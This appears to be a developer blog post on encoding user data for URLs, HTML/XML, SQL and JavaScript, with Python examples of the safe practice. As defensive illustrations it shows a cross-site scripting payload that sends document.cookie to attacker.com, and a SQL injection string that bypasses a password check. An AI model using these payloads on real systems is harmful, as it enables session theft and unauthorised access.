I seem to run into this at every job I’ve had, so perhaps it’s time to drop some knowledge on a more global scale. It seems that many people don’t realize that when they put data (especially when provided by users) into different contexts, that data almost always needs to be encoded. There are very few exceptions. The consequences of not doing so range from improperly formed data (XML) to downright nasty security vulnerabilities (HTML and SQL). Here are just a few instances of places where you need to ensure that data is properly encoded.
URLs
As someone working on web services, I run into this encoding issue more often than most. URLs are delicate things. There are rules governing URLs that most people don’t seem to grasp. Chief among them is that you must URL encode every piece of data that goes into a URL. This matters most in the query string. If your data contains characters such as “&”, “?” or “=”…you’re screwed if you let that through. Imagine you want to set the query parameter “foo” to “bar&baz=jimmy”. If you dump that in raw, you get the following:
?foo=bar&baz=jimmy
Instead of a single “foo” parameter, you’ve ended up with a “foo” and a “baz” parameter. Even worse, the “foo” parameter is set to “bar”, which isn’t what was intended. URL encoding the value first gives you what you were after in the first place:
?foo=bar%26baz%3Djimmy
Bear in mind, it isn’t enough to URL encode just the value. The parameter name must be URL encoded as well.
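To make the difference concrete, here is a minimal sketch using Python's standard `urllib.parse` module. The parameter names and values are the ones from the example above, plus one made-up parameter name (“a&b”) to show that names need encoding too. Treat it as an illustration rather than the only way to build a query string.

```python
from urllib.parse import parse_qs, urlencode

value = "bar&baz=jimmy"

# Dumping the value in raw: the server sees two parameters.
raw_query = "foo=" + value
raw_params = parse_qs(raw_query)

# urlencode() percent-encodes both the names and the values.
safe_query = urlencode({"foo": value})
safe_params = parse_qs(safe_query)

# Parameter names get the same treatment ("a&b" is a made-up name).
odd_name_query = urlencode({"a&b": "1"})

print(raw_params)      # {'foo': ['bar'], 'baz': ['jimmy']}
print(safe_query)      # foo=bar%26baz%3Djimmy
print(safe_params)     # {'foo': ['bar&baz=jimmy']}
print(odd_name_query)  # a%26b=1
```

Decoding the encoded query string gives back the single “foo” parameter with its full value intact.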
HTML and XML
HTML and XML have similar issues (for the most part), so I’m lumping them together here. This is one of the more commonly understood encoding issues around because almost everybody has thrown an unencoded “<” into their HTML/XML at some point. The result, if you’re lucky, is a useful error message from your browser/XML parser telling you where that little bastard is. If you’re unlucky, it turns into a silent failure or it monkeys with the content in a way that is subtle and difficult to detect.
In the worst cases, you inline HTML/XML content into actual HTML/XML, making it impossible for a parser to tell that anything is wrong. Imagine, in both cases, that you have some plain text content to include in your file that looks like this:
<div>foo!</div>
The parsers will simply treat that content as another DOM node. If you’re fortunate, your XML specifies some form of schema that would indicate the document is invalid…but I wouldn’t count on it.
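A small sketch of that behavior, using Python's standard `xml.etree.ElementTree` parser and `xml.sax.saxutils.escape`. The `<note>` wrapper element is made up for the illustration; any parent element would behave the same way.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

content = "<div>foo!</div>"  # meant to be plain text

# Inlined raw: the parser sees a perfectly valid child element.
raw_doc = "<note>" + content + "</note>"
raw_root = ET.fromstring(raw_doc)

# XML encoded first: the parser sees text, as intended.
escaped_doc = "<note>" + escape(content) + "</note>"
escaped_root = ET.fromstring(escaped_doc)

print(len(raw_root), raw_root[0].tag)  # 1 div
print(raw_root.text)                   # None
print(escaped_doc)                     # <note>&lt;div&gt;foo!&lt;/div&gt;</note>
print(len(escaped_root))               # 0
print(escaped_root.text)               # <div>foo!</div>
```

Neither document raises a parse error, which is exactly the problem: only the encoded version round-trips the original text.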
The example I just gave is pretty benign and unlikely to cause you any serious harm. But in HTML there are far worse dangers possible. Imagine if you were to inadvertently inline the following content:
<script>document.write("<img src='http://attacker.com/capturecookies.php?cookies=" + escape(document.cookie) + "'/>");</script>
I think I did that right, but even if I didn’t, you get the idea. That content must be HTML encoded (or XML encoded) in order to defuse what may be a devastating cross-site scripting attack (sending your authentication cookies to a foreign domain). Alternatively, if you’re expecting HTML content, you need to scrub it…but that’s another topic. The point is, if you’re putting plain text into HTML or XML…encode it.
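As a rough sketch of what “encode it” looks like in practice, here is Python's standard `html.escape` applied to a script payload. The `render_comment` function and the payload are hypothetical stand-ins for wherever your application drops user text into a page.

```python
import html

def render_comment(text: str) -> str:
    """Hypothetical template helper: wrap user text in a paragraph."""
    # quote=True also encodes " and ', which matters inside attributes.
    return "<p>" + html.escape(text, quote=True) + "</p>"

payload = "<script>alert(document.cookie)</script>"
rendered = render_comment(payload)

print(rendered)
# <p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>
```

The browser displays the payload as literal text instead of executing it. Most template engines can do this for you automatically, which is usually a safer default than remembering to call an encoder by hand.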
SQL
SQL injection attacks are one of the oldest attacks around. Imagine you have a login form that takes a username and a password. Behind the scenes you have the following SQL code:
execute_sql("select * from users where username='$username' and password='$password'");
What happens when I type in a username of “ryan” and a password of “' or password like '%”? Let’s do the substitution:
execute_sql("select * from users where username='ryan' and password='' or password like '%'");
I may not have that SQL exactly right, but (again) you get the gist of what’s happening. If you allow this, you’ve just made it possible for someone to log in as any user without having the password. This actually happened at a company I used to work at. Fortunately we discovered the exploit internally. The solution is to SQL encode the parameters. There are usually different ways of doing this. I’ve seen some libraries that provide methods to encode strings for you. In most cases, however, database libraries provide prepared statements, which accomplish the same thing by passing the values to the database separately from the query text so they are never parsed as SQL.
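Here is a minimal sketch of the attack and the fix, using Python's standard `sqlite3` module with an in-memory database. The table layout, the `login_unsafe` and `login_safe` functions, and the stored plain-text password are all assumptions that simply mirror the example above; a real system would store password hashes.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table users (username text, password text)")
conn.execute("insert into users values ('ryan', 'secret')")

def login_unsafe(username: str, password: str) -> list:
    # Vulnerable: user input is pasted straight into the SQL text.
    sql = (
        f"select * from users where username='{username}' "
        f"and password='{password}'"
    )
    return conn.execute(sql).fetchall()

def login_safe(username: str, password: str) -> list:
    # Placeholders keep the values out of the SQL text entirely.
    sql = "select * from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchall()

attack = "' or password like '%"

print(login_unsafe("ryan", attack))    # [('ryan', 'secret')]
print(login_safe("ryan", attack))      # []
print(login_safe("ryan", "secret"))    # [('ryan', 'secret')]
```

With placeholders, the attack string is compared against the stored password as an ordinary value, so it matches nothing.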
JavaScript
The reason I decided to write this was seeing Gopal’s post dealing with encoding strings in JavaScript. Gopal highlights an XSS caused by not escaping a forward slash. He goes on to mention that JSON encoders may escape them, but don’t necessarily do so. The issue here is that JavaScript inside of HTML is not JSON. While JSON may escape the forward slash, JavaScript must escape the forward slash. In this case, JSON encoding is the wrong solution to the problem. It’s close, but not quite the right answer. It would be like using an HTML encoder to encode XML. While it may work in certain cases and it’s very close to the right answer, it’s still wrong. Use the right encoder for the context. If you’re encoding data in XML, use an XML encoder. If you’re encoding data in JavaScript, use a JavaScript encoder.
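To illustrate the gap between a JSON encoder and a JavaScript encoder, here is a hedged sketch. The `js_string_literal` function is hypothetical and written for this example: it escapes every character that is not an ASCII letter or digit as a `\uXXXX` sequence, which is one conservative approach and not necessarily the one Gopal's post or any particular library uses. Python's standard `json.dumps` is shown alongside it for comparison.

```python
import json

def js_string_literal(value: str) -> str:
    """Hypothetical encoder: text -> double-quoted JavaScript string literal."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
            continue
        code = ord(ch)
        if code > 0xFFFF:
            # Characters outside the BMP need a surrogate pair in \uXXXX form.
            code -= 0x10000
            out.append("\\u%04x" % (0xD800 + (code >> 10)))
            out.append("\\u%04x" % (0xDC00 + (code & 0x3FF)))
        else:
            out.append("\\u%04x" % code)
    return '"' + "".join(out) + '"'

text = "</script>"

print(json.dumps(text))         # "</script>"
print(js_string_literal(text))  # "\u003c\u002fscript\u003e"
```

Python's JSON encoder leaves the forward slash alone, so its output would still close an enclosing script element if inlined into HTML. The JavaScript-oriented encoder produces a literal that evaluates to the same string but contains nothing the HTML parser can misread.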